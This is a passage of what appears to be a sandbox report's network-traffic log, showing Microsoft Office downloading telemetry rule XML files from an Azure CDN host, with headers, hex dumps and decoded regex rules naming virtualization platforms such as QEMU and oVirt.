                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 477
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                            x-ms-request-id: 2d97bf78-001e-0066-1b9f-18561e000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd48hzllksrq1r6zsvs00000001r0000000001ge0
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            82192.168.2.54980713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:01 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                            x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030901Z-1657d5bbd482tlqpvyz9e93p5400000004e000000000epgt
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            83192.168.2.54980813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 485
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                            x-ms-request-id: 8a5b80a7-801e-0067-69f1-18fe30000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48xlwdx82gahegw4000000004f000000000tftr
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            84192.168.2.54980913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:01 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 411
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                            x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd4824mj9d6vp65b6n400000004hg00000000gwmp
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            85192.168.2.54981013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 470
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                            x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48xsz2nuzq4vfrzg800000004a000000000538w
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            86192.168.2.54981113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 427
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                            x-ms-request-id: 0377c3fc-101e-000b-65dc-165e5c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48xlwdx82gahegw4000000004n00000000084k2
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            87192.168.2.54981213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 502
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                            x-ms-request-id: a5e58c1d-b01e-00ab-5ac9-16dafd000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48lknvp09v995n79000000003x000000000sm7d
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            88192.168.2.54981313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 407
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                            x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48brl8we3nu8cxwgn00000004qg00000000cerm
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            89192.168.2.54981413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 474
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                            x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48brl8we3nu8cxwgn00000004kg00000000tenr
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            90192.168.2.54981513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 408
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                            x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd482krtfgrg72dfbtn000000043000000000f7p2
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            91192.168.2.54981613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:02 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:02 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 469
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
